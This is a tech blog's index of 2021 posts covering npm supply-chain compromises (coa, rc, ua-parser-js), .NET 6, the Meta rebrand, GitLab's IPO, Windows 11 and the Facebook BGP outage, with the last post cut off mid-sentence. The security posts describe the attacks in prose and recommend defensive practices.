wasn\u0026rsquo;t committed (and you\u0026rsquo;d be surprised how many projects don\u0026rsquo;t commit lockfiles), npm install would happily pull the malicious version.\nPractical Defences # I\u0026rsquo;ve been hardening Node.js build pipelines for years, and here\u0026rsquo;s what I recommend today:\nAlways commit your lockfile. Whether it\u0026rsquo;s package-lock.json or yarn.lock, it belongs in version control. This pins your transitive dependencies to exact versions and prevents surprise upgrades.\nUse npm ci instead of npm install in CI/CD. The ci command installs exactly what\u0026rsquo;s in the lockfile and fails if the lockfile is out of sync with package.json. It\u0026rsquo;s faster and more deterministic.\nAudit regularly, but don\u0026rsquo;t rely on it. npm audit catches known vulnerabilities in published advisories, but these supply chain attacks are zero-days — there\u0026rsquo;s no advisory until after the compromise is discovered. Audit is necessary but not sufficient.\nConsider package pinning for critical dependencies. Tools like Socket and Snyk are beginning to offer supply chain detection that goes beyond known vulnerability databases. They analyse package behaviour changes between versions, which would have flagged the coa and rc attacks.\nEvaluate alternatives to deep dependency trees. This is the hardest advice to follow, but it\u0026rsquo;s the most effective. Every dependency you add is a trust relationship. Every transitive dependency is a trust relationship you didn\u0026rsquo;t explicitly choose. Consider whether you really need that utility library, or whether a few lines of your own code would serve better.\nMy Take # Three major npm supply chain attacks in the space of a month (ua-parser-js, coa, rc) isn\u0026rsquo;t a coincidence — it\u0026rsquo;s a campaign. The JavaScript ecosystem\u0026rsquo;s popularity and its dependency model make it the highest-value target for supply chain attacks in the software world.\nGitHub and npm are starting to take this seriously. The upcoming 2FA requirements for top packages are a good step. But we need more fundamental changes: better provenance tracking, package signing, and reproducible builds. The Sigstore project and npm\u0026rsquo;s own plans for package signing give me some hope.\nIn the meantime, treat your node_modules directory like what it is: a collection of code from thousands of strangers that runs with full access to your system. Lock your dependencies, monitor for anomalies, and think twice before adding that next npm install.\nThe npm ecosystem\u0026rsquo;s greatest strength — its vast package registry and frictionless dependency management — is also its greatest vulnerability. Until the security model catches up with the scale, these attacks will continue.\n","date":"11 November 2021","externalUrl":null,"permalink":"/posts/211111-npm-coa-rc-supply-chain-attacks/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Popular npm packages coa and rc were hijacked to distribute malware, impacting thousands of projects and raising urgent questions about supply chain security.","title":"npm Supply Chain Under Siege — The coa and rc Package Compromises","type":"posts"},{"content":"Microsoft\u0026rsquo;s .NET Conf 2021 is just days away, and the .NET 6 release candidates have been painting a clear picture: this is the release where Microsoft\u0026rsquo;s \u0026ldquo;One .NET\u0026rdquo; vision actually comes together. After years of transition — from .NET Framework to .NET Core, through the awkward .NET 5 renumbering — version 6 is shaping up to be the most significant .NET release in years.\nI\u0026rsquo;ve been working with .NET since the original framework shipped in 2002. I\u0026rsquo;ve lived through every major transition, including the painful years of maintaining parallel .NET Framework and .NET Core applications. .NET 6 feels like the release that finally lets us stop qualifying which .NET we\u0026rsquo;re talking about.\nWhat Makes .NET 6 Different # The headline feature is Long-Term Support (LTS). .NET 5 was a \u0026ldquo;Current\u0026rdquo; release with just 18 months of support, which made it a tough sell for enterprise adoption. .NET 6 gets three years of support, making it the natural migration target for organisations still running .NET Framework or older .NET Core versions.\nBut LTS status alone doesn\u0026rsquo;t make a release exciting. The performance improvements do. The .NET team has been methodically benchmarking and optimising, and the results from RC2 are remarkable:\nMinimal APIs reduce the ceremony of building HTTP services to almost nothing. A complete web API in six lines of code isn\u0026rsquo;t just a demo trick — it signals a genuine rethinking of how .NET approaches simplicity. Hot Reload finally works properly across the stack, letting you modify C# code and see changes reflected without restarting the application. This has been standard in interpreted language ecosystems for years, so it\u0026rsquo;s about time. PGO (Profile-Guided Optimisation) as a runtime feature means the JIT compiler can optimise based on actual usage patterns. Dynamic PGO is still experimental, but initial benchmarks show 20-30% throughput improvements in some workloads. MAUI (Multi-platform App UI) brings cross-platform native application development to .NET, though it\u0026rsquo;ll ship separately as it needs more baking time. The C# 10 Improvements Matter # .NET 6 ships with C# 10, and while individual language features rarely change how you work, the cumulative effect here is notable. Global usings and file-scoped namespaces reduce boilerplate significantly. A typical C# file used to start with 10-15 lines of using statements and namespace declarations. Now it can start with your actual code.\n// Before: ceremony using System; using System.Collections.Generic; using System.Linq; namespace MyApp.Services { public class UserService { // ... } } // After: just code public class UserService { // ... } Record structs extend the record pattern to value types, which is excellent for high-performance scenarios where you want immutability semantics without heap allocations. For developers building APIs that handle high throughput — which is increasingly all of us — this matters.\nPerformance: The Real Story # The TechEmpower benchmarks have been tracking .NET\u0026rsquo;s performance trajectory, and it\u0026rsquo;s been consistently climbing. .NET 6 puts C# in genuine competition with Go and Rust for web server workloads, which would have been laughable a decade ago.\nThe System.Text.Json improvements alone are worth the upgrade. JSON serialisation is the bread and butter of API development, and the source generators in .NET 6 eliminate reflection-based serialisation overhead entirely. You get compile-time generated serialisers that are significantly faster and produce less garbage collection pressure.\nThe .NET team has also invested heavily in Span\u0026lt;T\u0026gt; and Memory\u0026lt;T\u0026gt; adoption throughout the base class libraries. The result is less allocation, less copying, and better throughput across the board. FileStream has been completely rewritten on both Windows and Linux for better async I/O performance.\nMy Take # .NET 6 represents Microsoft delivering on a promise that took nearly six years to fulfil. The journey from \u0026ldquo;.NET Core is the future\u0026rdquo; at .NET Conf 2016 to \u0026ldquo;here\u0026rsquo;s the unified platform\u0026rdquo; has been longer and bumpier than anyone wanted, but the destination is genuinely good.\nIf you\u0026rsquo;re still on .NET Framework, this is your migration target. If you\u0026rsquo;re on .NET Core 3.1 (which goes out of support next December), start planning your upgrade now. The migration tooling has improved dramatically, and most libraries have caught up.\nWhat impresses me most isn\u0026rsquo;t any single feature — it\u0026rsquo;s the coherence. Minimal APIs, Hot Reload, C# 10 improvements, and performance gains all point in the same direction: making .NET development faster, simpler, and more productive. Microsoft has been listening to what developers actually want, and it shows.\nThe .NET ecosystem hasn\u0026rsquo;t been this healthy in years. With .NET 6, I\u0026rsquo;d argue it\u0026rsquo;s one of the strongest general-purpose development platforms available. Whether you\u0026rsquo;re building APIs, desktop apps, mobile clients, or cloud services, there\u0026rsquo;s now a single, performant, well-supported framework that handles all of it. That\u0026rsquo;s what \u0026ldquo;One .NET\u0026rdquo; always meant, and it\u0026rsquo;s finally here.\n","date":"4 November 2021","externalUrl":null,"permalink":"/posts/211104-dotnet6-release-unified-platform/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"With .NET 6 approaching release at .NET Conf, Microsoft finally delivers on its promise of a single unified platform — and it’s genuinely impressive.","title":".NET 6 Arrives — The Unified Platform Microsoft Has Been Promising","type":"posts"},{"content":"Yesterday, Mark Zuckerberg stood on a virtual stage and announced that Facebook — the company, not the app — is now called Meta. The stock ticker changes to MVRS in December. The stated mission: building the metaverse, an interconnected set of immersive digital experiences that supposedly represents the next evolution of social technology.\nI\u0026rsquo;ve been in this industry long enough to have seen several \u0026ldquo;next big platform\u0026rdquo; declarations. Some panned out (mobile, cloud). Some didn\u0026rsquo;t (Google Glass, Second Life in its original incarnation). The Meta rebrand sits in an interesting middle ground — it\u0026rsquo;s simultaneously a distraction from very real PR problems and a genuine multi-billion-dollar engineering commitment.\nThe Infrastructure Implications Are Real # Whatever you think of the metaverse pitch, the underlying engineering challenges are staggering. Zuckerberg talked about persistent shared spaces, real-time rendering at scale, and cross-platform interoperability. Each of these is a distributed systems problem of enormous complexity.\nConsider just the networking layer. Current VR experiences are largely single-player or small-group affairs running on dedicated servers. A persistent shared world with millions of concurrent users requires edge computing infrastructure that doesn\u0026rsquo;t fully exist yet. Facebook — sorry, Meta — is already one of the largest infrastructure operators on the planet. They\u0026rsquo;re signaling they intend to get even larger.\nTheir Reality Labs division reportedly has 10,000 people working on AR and VR projects. The company has committed to spending roughly $10 billion on metaverse development this year alone. That\u0026rsquo;s not pocket change, even for a company with Meta\u0026rsquo;s revenue.\nWhat Developers Should Actually Pay Attention To # If you strip away the marketing and the awkward demos of legless avatars in virtual meeting rooms, there are some genuinely interesting technical developments happening here:\nSpatial computing SDKs: The Presence Platform announced at Connect includes new APIs for mixed reality development on Quest devices. The Interaction SDK and Passthrough API hint at a world where AR/VR development becomes more accessible to mainstream developers, not just graphics specialists.\nAI and computer vision: The metaverse pitch relies heavily on advances in real-time environment understanding, hand tracking, eye tracking, and natural language processing. Meta\u0026rsquo;s AI research division (FAIR) has been publishing solid work in these areas, and more of it is likely to get productized.\nOpen standards: Interestingly, Meta has been talking about open standards and interoperability for the metaverse. They\u0026rsquo;re part of the Khronos Group working on OpenXR. Whether they follow through on openness when money is on the line remains to be seen, but the rhetoric is encouraging.\nThe Elephant in the (Virtual) Room # I can\u0026rsquo;t write about this without addressing the obvious: this rebrand lands amid a torrent of negative press. The Facebook Papers, leaked by Frances Haugen, paint a damning picture of a company that prioritises engagement metrics over user safety. Renaming yourself doesn\u0026rsquo;t fix that.\nFrom a technical ethics perspective, the metaverse raises the same concerns at a higher magnitude. If Facebook struggled to moderate text posts and 2D images, how do they plan to moderate real-time 3D interactions? The harassment problems in VR spaces are already well-documented. Scaling those spaces up by orders of magnitude without solving moderation first seems reckless.\nAs engineers, we have to think about these things. The technical challenges of building the metaverse are fascinating. But \u0026ldquo;can we build it?\u0026rdquo; and \u0026ldquo;should we build it this way?\u0026rdquo; are different questions.\nMy Take # I think the metaverse — or something like it — will eventually exist. But I\u0026rsquo;m skeptical it\u0026rsquo;ll look like what Zuckerberg presented. The most transformative platforms tend to emerge bottom-up from open ecosystems, not top-down from a single corporation\u0026rsquo;s vision.\nWhat I\u0026rsquo;m watching closely is the infrastructure layer. The compute, networking, and rendering technologies being developed for metaverse applications will have applications far beyond virtual meeting rooms. Real-time collaborative 3D environments have obvious use cases in engineering, medicine, education, and remote work that don\u0026rsquo;t require buying into the full metaverse vision.\nFor now, I\u0026rsquo;d recommend developers keep an eye on the SDKs and APIs coming out of Meta\u0026rsquo;s platform, explore WebXR if you haven\u0026rsquo;t already, and remember that the most valuable skills in any platform shift are the fundamentals: distributed systems, networking, and clean API design.\nThe name change is marketing. The $10 billion annual investment is engineering. Pay attention to the engineering.\n","date":"28 October 2021","externalUrl":null,"permalink":"/posts/211028-facebook-rebrands-to-meta/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Facebook’s rebrand to Meta signals a massive infrastructure bet on the metaverse — here’s what it means for developers and platform engineers.","title":"Facebook Becomes Meta — What the Rebrand Means for Platform Engineering","type":"posts"},{"content":"Another week, another npm supply chain attack — except this one hit different. On October 22nd, the widely-used ua-parser-js package was compromised when an attacker gained access to the maintainer\u0026rsquo;s npm account and published three malicious versions (0.7.29, 0.8.0, and 1.0.0). The package has over 7 million weekly downloads and is used by companies including Facebook, Amazon, Microsoft, Google, and Slack.\nThe malicious versions contained scripts that downloaded and executed cryptominers on Linux systems and both cryptominers and credential-stealing trojans on Windows. If your CI/CD pipeline, development environment, or production system pulled one of these versions between the time of publication and npm\u0026rsquo;s takedown, you may have been compromised.\nI\u0026rsquo;ve been writing about supply chain security for months now, and every new incident makes the same point more forcefully: our dependency on the npm ecosystem is a systemic risk that we are not adequately addressing.\nThe Attack Vector # The attack followed a pattern we\u0026rsquo;ve seen before: account takeover of a legitimate maintainer. The attacker didn\u0026rsquo;t create a typosquatted package or a malicious new library. They hijacked an established, trusted package with millions of users and years of history. This is the supply chain equivalent of breaking into a bank vault rather than setting up a fake ATM.\nThe malicious payload was straightforward but effective:\nA preinstall script that executed platform-specific binaries On Linux: a cryptominer binary On Windows: a cryptominer plus a DLL that harvested credentials from browsers and sent them to a remote server The versions were live on npm for approximately four hours before being identified and pulled. Four hours doesn\u0026rsquo;t sound like much, but consider how many CI/CD pipelines run during a workday. How many npm install commands execute across the world in four hours. How many Docker images get built with npm ci as a step. The blast radius of even a brief compromise of a popular package is enormous.\nThe compromised versions were 0.7.29, 0.8.0, and 1.0.0. Clean versions (0.7.30, 0.8.1, and 1.0.1) were published shortly after. If you use ua-parser-js, check your lock files immediately.\nWhy This Keeps Happening # The fundamental problem is that npm\u0026rsquo;s security model puts enormous trust in individual maintainer accounts, and those accounts are often protected by nothing more than a password. The ua-parser-js maintainer, Faisal Salman, confirmed that his account was compromised — likely through credential reuse or a phishing attack.\nnpm has offered two-factor authentication for years, but adoption remains low. And even 2FA doesn\u0026rsquo;t prevent all account takeover scenarios — session hijacking, OAuth token theft, and social engineering attacks against npm support can all bypass it.\nBut the account security issue is only the surface problem. The deeper issues are architectural:\nImplicit trust in updates: When you specify \u0026quot;ua-parser-js\u0026quot;: \u0026quot;^0.7.28\u0026quot; in your package.json, you\u0026rsquo;re saying \u0026ldquo;I trust any future 0.7.x release.\u0026rdquo; Your lock file protects you on npm ci, but npm install will happily pull a new matching version. And many teams use npm install in their Dockerfiles and CI pipelines.\nNo code review for published packages: Anyone with publish access can push arbitrary code to npm. There\u0026rsquo;s no review process, no signature verification by default, no diff between versions shown to consumers. You get what you get.\nMassive dependency trees: A typical Node.js application has hundreds or thousands of transitive dependencies. You may never have heard of ua-parser-js, but there\u0026rsquo;s a good chance something in your dependency tree uses it. The npm ls ua-parser-js command might surprise you.\nPractical Defenses # After the initial panic, the practical question is: what can we actually do about this? Here\u0026rsquo;s what I\u0026rsquo;m recommending to teams right now:\nLock files are non-negotiable. Always use npm ci in CI/CD pipelines, never npm install. The lock file pins exact versions and integrity hashes. If someone publishes a compromised version, your builds won\u0026rsquo;t pull it as long as your lock file hasn\u0026rsquo;t been updated.\nAudit dependencies regularly. Run npm audit as a CI step. It\u0026rsquo;s not perfect — it only catches known vulnerabilities, not active compromises — but it\u0026rsquo;s a baseline. Consider tools like Socket or Snyk that do deeper behavioral analysis of packages.\nReview dependency updates before merging. When Dependabot or Renovate creates a PR to update a package, actually look at what changed. For direct dependencies, check the changelog and the diff. For a package like ua-parser-js, a new preinstall script downloading binaries should be an obvious red flag.\nConsider using a private registry or proxy. Tools like Verdaccio, Artifactory, or npm Enterprise let you control which packages and versions are available to your team. You can implement an allowlist, delay propagation of new versions, or require manual approval for updates to critical packages.\nMinimize your dependency surface. Do you really need that package? For something like user-agent parsing, consider whether a simple regex or a smaller, more focused package might suffice. Every dependency is an attack surface.\nThe Broader Pattern # This is the third major npm supply chain incident in recent months, following the coa and rc compromises that happened around the same time. The pattern is clear: attackers have realized that compromising a single popular npm package gives them access to thousands of downstream projects simultaneously.\nThe npm registry serves billions of downloads per week. It\u0026rsquo;s critical infrastructure for the global software supply chain. And it\u0026rsquo;s secured, fundamentally, by individual maintainers choosing good passwords and enabling 2FA.\nWe need systemic solutions. npm\u0026rsquo;s recent acquisition by GitHub (and by extension, Microsoft) gives them the resources to implement stronger controls — mandatory 2FA for popular packages, automated behavioral analysis of new versions, signing and provenance attestation. Some of these are in progress. They need to ship faster.\nMy Take # Every time I write about a supply chain attack, I feel like I\u0026rsquo;m repeating myself. And I am, because the underlying dynamics haven\u0026rsquo;t changed. We\u0026rsquo;re building our software on foundations we don\u0026rsquo;t control, maintained by people we don\u0026rsquo;t know, secured by mechanisms we don\u0026rsquo;t verify.\nI don\u0026rsquo;t say this to blame maintainers — Faisal Salman maintains ua-parser-js as a side project, and he responded quickly and transparently once the compromise was identified. The problem is structural. We\u0026rsquo;ve built an ecosystem where individual volunteers are single points of failure for critical infrastructure used by the world\u0026rsquo;s largest companies.\nUntil the ecosystem builds better guardrails — and until developers take dependency management seriously as a security concern — these incidents will keep happening. Lock your dependencies. Audit your supply chain. And maybe think twice before adding that next npm install.\nPart of the Security in Practice series. Previous entries have covered the Confluence RCE, OMIGOD vulnerability, and the OWASP Top 10 2021 update. Supply chain security remains the defining challenge of modern software development.\n","date":"21 October 2021","externalUrl":null,"permalink":"/posts/211021-ua-parser-js-npm-supply-chain-attack/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"The popular ua-parser-js npm package was hijacked to deliver cryptominers and credential stealers, affecting millions of weekly downloads.","title":"ua-parser-js Compromised — Supply Chain Attacks Hit npm Again","type":"posts"},{"content":"GitLab went public on the NASDAQ this Thursday, opening at $77 per share — well above its IPO price of $77 — and quickly climbing to give the company a valuation north of $11 billion. For a company built around an open-source code repository that started as a side project by Ukrainian developer Dmitriy Zaporozhets in 2011, it\u0026rsquo;s a remarkable milestone.\nBut beyond the financial headlines, GitLab\u0026rsquo;s IPO is significant for what it says about the viability of open-source business models, the competitive dynamics of the DevOps platform market, and where developer tooling is headed.\nThe Open-Core Model, Validated # GitLab has been one of the most visible practitioners of the \u0026ldquo;open-core\u0026rdquo; business model: a substantial open-source community edition (CE) that anyone can self-host for free, paired with proprietary enterprise features that generate revenue. Their pricing tiers are transparent, and they\u0026rsquo;ve been remarkably open about their internal operations — their handbook is public, their strategy documents are public, even their OKRs are public.\nThis model has always had its critics. Open-source purists argue that withholding features creates a two-tier community. Investors have historically been skeptical about building a business on software anyone can fork. And competitors have tried to undercut open-core companies by offering their proprietary features as open-source alternatives.\nGitLab\u0026rsquo;s IPO doesn\u0026rsquo;t settle those debates, but it does demonstrate that open-core can produce a company with real revenue ($233 million ARR at last report), real growth, and enough market confidence to go public. That matters for the entire open-source ecosystem, because it provides a clear proof point for founders and investors considering this model.\nContrast this with the struggles other open-source companies have faced. MongoDB had to create the SSRL license to prevent cloud providers from offering their software as a service. Elastic relicensed away from Apache 2.0 for similar reasons. Redis Labs added the Commons Clause. Each of these moves generated significant community backlash. GitLab, by contrast, has maintained a relatively stable relationship with its community edition while growing its enterprise business. That\u0026rsquo;s not easy to pull off.\nThe Single Platform Bet # What sets GitLab apart strategically is their commitment to being a single application for the entire DevOps lifecycle. Source control, CI/CD, package registry, security scanning, monitoring, issue tracking — it\u0026rsquo;s all in one product. This is a fundamentally different approach from GitHub, which has been assembling capabilities through acquisitions and integrations (Actions for CI/CD, npm for packages, Dependabot for security, Codespaces for development environments).\nI\u0026rsquo;ve used both platforms extensively, and the trade-offs are real. GitLab\u0026rsquo;s integrated approach means everything works together without configuration — your merge request shows CI results, security scan findings, and deployment status in one view. But it also means you\u0026rsquo;re locked into GitLab\u0026rsquo;s implementation of each capability. If their CI runner performance doesn\u0026rsquo;t meet your needs, or their security scanning misses things that a specialized tool catches, you\u0026rsquo;re stuck with workarounds.\nGitHub\u0026rsquo;s approach gives you best-of-breed flexibility through its marketplace and integrations, but you pay for it in configuration complexity and the occasional integration that breaks after an update.\nFor smaller teams, I increasingly recommend GitLab because the operational overhead of managing multiple tool integrations outweighs the benefits of best-of-breed selection. For larger organizations with dedicated platform teams, GitHub plus specialized tools often makes more sense. But this is a genuinely close call, and the gap is narrowing.\nWhat This Means for Self-Hosted Infrastructure # One aspect that doesn\u0026rsquo;t get enough attention: GitLab\u0026rsquo;s self-hosted offering remains genuinely viable, and for many organizations, it\u0026rsquo;s the right choice. Financial institutions, government agencies, healthcare organizations, and companies with strict data sovereignty requirements can run the full GitLab stack on their own infrastructure.\nI\u0026rsquo;ve deployed GitLab on-premises for clients in regulated industries, and while it\u0026rsquo;s not trivial — the Omnibus package is large, upgrades require planning, and high-availability configurations demand real infrastructure expertise — it works. This is increasingly rare in a world where most developer tools have gone SaaS-only.\nThe IPO pressure could change this calculus. Public markets want growing SaaS revenue with high margins. Self-hosted licenses are lumpy, harder to upsell, and carry support costs. I hope GitLab continues to invest in their self-hosted offering, but I\u0026rsquo;ll be watching their resource allocation carefully over the coming quarters.\nThe Competitive Landscape # GitLab\u0026rsquo;s IPO happens against a backdrop of intense competition in the DevOps platform space. GitHub, backed by Microsoft\u0026rsquo;s resources, continues to ship features at a remarkable pace. Atlassian\u0026rsquo;s Bitbucket still has significant enterprise penetration, though it feels like it\u0026rsquo;s losing momentum. AWS CodeCommit exists but is rarely anyone\u0026rsquo;s first choice.\nThe more interesting competition might come from the edges. Smaller tools like Gitea and Forgejo are picking up steam in the self-hosted space. Specialized CI/CD platforms like CircleCI and Buildkite continue to push the performance envelope. And the entire \u0026ldquo;platform engineering\u0026rdquo; movement — where companies build internal developer platforms using tools like Backstage — represents a different approach to the same problem GitLab is solving.\nMy Take # I have a soft spot for GitLab\u0026rsquo;s story. A company that started as an open-source project, maintained its commitment to transparency and community, and grew into a public company without abandoning its core values — that\u0026rsquo;s rare. It\u0026rsquo;s not perfect; the open-core tension is real, and some of the feature gating decisions feel arbitrary. But compared to the licensing gymnastics we\u0026rsquo;ve seen from other open-source companies, GitLab\u0026rsquo;s approach has been remarkably consistent.\nWhat I\u0026rsquo;m most curious about is how being public affects their development velocity and decision-making. Quarterly earnings pressure has a way of shifting priorities from \u0026ldquo;what\u0026rsquo;s right for the product\u0026rdquo; to \u0026ldquo;what moves the revenue number.\u0026rdquo; GitLab\u0026rsquo;s radical transparency — including their public product roadmap — means we\u0026rsquo;ll be able to watch this play out in real time.\nFor now, this is a good day for open-source business models. Not because financial success is the ultimate measure of an open-source project — it isn\u0026rsquo;t — but because it demonstrates that you can build sustainable businesses that fund open-source development at scale. And we need more of those.\nPart of the Developer Landscape series, exploring the tools, platforms, and business models shaping software development. GitLab\u0026rsquo;s journey from side project to public company is one of the more compelling stories in recent developer tooling history.\n","date":"14 October 2021","externalUrl":null,"permalink":"/posts/211014-gitlab-ipo-open-source-business/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitLab’s successful IPO this week validates the open-core model and raises important questions about the future of open-source developer tooling.","title":"GitLab Goes Public — What an IPO Means for Open Source Business Models","type":"posts"},{"content":"Windows 11 officially launched on October 5th, and the tech press has been predictably focused on the centered taskbar, rounded corners, and the somewhat controversial TPM 2.0 requirement. But as a developer who has spent the last few years watching Microsoft\u0026rsquo;s remarkable transformation from open-source adversary to genuine contributor, I\u0026rsquo;m far more interested in what\u0026rsquo;s happening under the hood.\nThe real story of Windows 11 for developers isn\u0026rsquo;t the visual refresh — it\u0026rsquo;s the continued maturation of Windows as a first-class development platform for workloads that historically lived exclusively on Linux.\nWSL: From Novelty to Necessity # The Windows Subsystem for Linux has been the single most impactful developer feature Microsoft has shipped in the last decade, and Windows 11 takes it further. WSLg (WSL with GUI support) is now integrated out of the box, meaning you can run Linux GUI applications alongside Windows ones without any additional configuration. This was technically available as a preview in Windows 10, but having it ship as a default feature signals where Microsoft sees the future.\nFor my daily workflow, this means I can run Linux-native development tools with GUI components — think database management tools, profiling visualizers, even full IDEs — without the overhead of a traditional VM or the friction of X server configuration. The integration uses Wayland under the hood, which means GPU acceleration works properly for OpenGL applications.\nBut the more substantive change is the improved architecture of WSL 2 in Windows 11. The Linux kernel ships as a Windows Update component now, which means it gets patched automatically through the normal update cycle. No more manually running wsl --update. For organizations that need to manage developer workstations at scale, this is a significant operational improvement.\nI\u0026rsquo;ve been running WSL 2 as my primary development environment for over a year, and the rough edges — network bridge configuration, file system performance across the Windows/Linux boundary, occasional DNS resolution quirks — have been steadily smoothed out. It\u0026rsquo;s not perfect, but it\u0026rsquo;s genuinely good enough for most development workflows.\nThe New Microsoft Store and What It Means for Tooling # Microsoft has completely rebuilt the Store with a new architecture that supports traditional Win32 apps, not just UWP/MSIX packages. More importantly for developers, they\u0026rsquo;ve relaxed the commerce model: developers can use their own payment systems and keep 100% of the revenue for non-game apps.\nWhy does this matter for development tools? Because it lowers the barrier for tool vendors to distribute through a managed channel. Package managers like winget have been filling this gap, but having traditional desktop applications available through the Store — with automatic updates, enterprise deployment support, and a consistent installation experience — addresses a real pain point in Windows development environment setup.\nThe Store will also be the distribution mechanism for Android apps on Windows, running through the Intel Bridge technology and Amazon\u0026rsquo;s Appstore. While this is primarily a consumer feature, it has implications for mobile developers who want to test Android applications without a separate emulator or physical device. We\u0026rsquo;ll have to see how the performance and compatibility story plays out once it\u0026rsquo;s actually available.\nDev Drive and Developer-Focused Features # Microsoft has been signaling that Windows 11 will introduce a \u0026ldquo;Dev Drive\u0026rdquo; feature — a ReFS-based volume optimized for development workloads. While this hasn\u0026rsquo;t shipped at launch, the direction is clear: Microsoft recognizes that developer workflows (millions of small files, constant reads and writes during builds, heavy file watching) need different storage optimization than typical user workflows.\nFor anyone who\u0026rsquo;s waited for node_modules to install on an NTFS volume, or watched a large git status crawl through a monorepo, this can\u0026rsquo;t come soon enough. The file system performance gap between Windows and Linux/macOS for development workloads has been a persistent complaint, and it\u0026rsquo;s encouraging to see Microsoft address it at the file system level rather than just saying \u0026ldquo;use WSL.\u0026rdquo;\nThe TPM 2.0 Requirement: Security or Fragmentation? # The elephant in the room is the hardware requirement. Windows 11 requires TPM 2.0, Secure Boot capability, and relatively recent processors. This locks out a significant number of machines that are perfectly capable of running the OS otherwise.\nFrom a security perspective, I understand the reasoning. TPM enables hardware-backed attestation, BitLocker without performance penalties, and a chain of trust from boot through application execution. As we move toward zero-trust security models, having a hardware root of trust isn\u0026rsquo;t a luxury — it\u0026rsquo;s a foundation.\nBut the pragmatic reality is that this creates fragmentation. Enterprise environments with thousands of desktops can\u0026rsquo;t just replace hardware overnight. Development teams may end up supporting both Windows 10 and Windows 11 environments for years. And the CI/CD implications are real — if your build agents are running on older hardware, they\u0026rsquo;re stuck on Windows 10 until 2025 at the earliest.\nFor organizations planning upgrades, my recommendation is to audit your hardware inventory sooner rather than later. The TPM requirement isn\u0026rsquo;t going away, and Windows 10 support has a defined end date. Better to plan the migration on your timeline than Microsoft\u0026rsquo;s.\nMy Take # Windows 11 feels like a consolidation release rather than a revolution. The WSL improvements, Store modernization, and focus on developer experience are all evolutionary steps in a direction Microsoft has been heading since Satya Nadella declared \u0026ldquo;Microsoft loves Linux\u0026rdquo; back in 2015. As someone who was deeply skeptical of that statement at the time, I have to admit: they\u0026rsquo;ve largely delivered.\nThe real question for developers is whether to upgrade now or wait. My advice: if you\u0026rsquo;re primarily using WSL for development, the improvements in Windows 11 are worth the upgrade. The GUI support, automatic kernel updates, and general polish improvements make a tangible difference in daily workflow. If you\u0026rsquo;re not using WSL, there\u0026rsquo;s less urgency — wait for the first feature update to shake out the inevitable early bugs.\nWhat I find most interesting is the strategic trajectory. Microsoft is positioning Windows as a meta-platform — a host environment that can run Windows applications, Linux applications, Android applications, and web applications, all with reasonable integration. Whether that vision fully materializes remains to be seen, but the building blocks are falling into place.\nPart of an ongoing series exploring the developer tools and platforms shaping how we build software. The evolution of Windows as a development platform has been one of the most surprising storylines of the past five years.\n","date":"7 October 2021","externalUrl":null,"permalink":"/posts/211007-windows-11-developer-perspective/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Windows 11 launched this week with WSL improvements, a new Microsoft Store, and Android app support coming soon. Here’s what matters for developers.","title":"Windows 11 Arrives — What Developers Actually Need to Know","type":"posts"},{"content":"If you tried to reach Facebook, Instagram, or WhatsApp earlier this week, you already know what happened. On October 4th, all three services — along with Facebook\u0026rsquo;s internal tools, badge systems, and even their ability to diagnose the problem — went completely offline for roughly six hours. The root cause? A BGP configuration change that effectively told the rest of the internet that Facebook\u0026rsquo;s network no longer existed.\nThis wasn\u0026rsquo;t a hack. It wasn\u0026rsquo;t a DDoS attack. It was a routine maintenance operation that went catastrophically wrong, and the cascading failures that followed are a masterclass in why infrastructure resilience is about so much more than redundant servers.\nWhat Actually Happened # The technical details, as they\u0026rsquo;ve emerged from Facebook\u0026rsquo;s engineering blog and from independent analysis by Cloudflare, paint a clear picture.\nFacebook\u0026rsquo;s backbone network — the internal infrastructure connecting their data centers — underwent a configuration change that inadvertently withdrew all the BGP route advertisements for Facebook\u0026rsquo;s IP address space. In BGP terms, Facebook\u0026rsquo;s autonomous system (AS32934) simply stopped announcing its routes. Within minutes, every DNS resolver on the planet noticed that Facebook\u0026rsquo;s authoritative nameservers were unreachable, and cached DNS records started expiring.\nThe result: Facebook didn\u0026rsquo;t just go down. It was erased from the internet\u0026rsquo;s routing tables. For the global routing infrastructure, Facebook\u0026rsquo;s IP addresses might as well have not existed.\nWhat makes this particularly interesting from an engineering perspective is the cascade effect. Facebook\u0026rsquo;s internal tools — the dashboards, the configuration management systems, the out-of-band access mechanisms — all relied on the same DNS and network infrastructure. When the network went down, engineers couldn\u0026rsquo;t use their normal tools to diagnose and fix the problem. Reports suggest that teams had to physically travel to data centers and access routers via console connections to begin the recovery.\nBGP: The Protocol Nobody Thinks About # For those unfamiliar, BGP (Border Gateway Protocol) is essentially the routing protocol that holds the internet together. It\u0026rsquo;s how networks tell each other \u0026ldquo;I can reach these IP addresses.\u0026rdquo; Every ISP, cloud provider, and major service runs BGP to advertise their routes to the rest of the internet.\nBGP was designed in the late 1980s, and its trust model reflects that era. When a network announces a route, other networks generally believe it. There\u0026rsquo;s no built-in authentication or verification. This is why BGP hijacking — where someone announces routes they don\u0026rsquo;t own — remains a persistent threat. And it\u0026rsquo;s why a misconfiguration can have such dramatic consequences.\nThe internet engineering community has been working on solutions like RPKI (Resource Public Key Infrastructure) to add cryptographic verification to route announcements, but adoption is still patchy. Facebook themselves had valid RPKI records, but that doesn\u0026rsquo;t protect against withdrawing your own routes.\nThe Deeper Lesson: Blast Radius and Control Plane Independence # The most important takeaway isn\u0026rsquo;t that BGP misconfigurations happen — they do, regularly, at ISPs and cloud providers worldwide. It\u0026rsquo;s that Facebook\u0026rsquo;s recovery mechanisms were inside the blast radius of the failure.\nThis is a pattern I\u0026rsquo;ve seen repeatedly in my career, and it\u0026rsquo;s one of the hardest problems in infrastructure engineering. Your monitoring, your configuration management, your deployment tools, your communication systems — they all depend on the very infrastructure they\u0026rsquo;re supposed to manage. When that infrastructure fails, you\u0026rsquo;re flying blind.\nThe principle is straightforward: your control plane must be independent of your data plane. In practice, this means:\nOut-of-band management that doesn\u0026rsquo;t depend on your primary network. Console servers with cellular failover. Separate management networks with independent routing. External monitoring that can detect and alert on failures even when your internal systems are down. If your PagerDuty alerts route through the same network as your production traffic, you have a problem. Runbooks for total failure scenarios. Not \u0026ldquo;one server is down\u0026rdquo; runbooks — \u0026ldquo;everything is 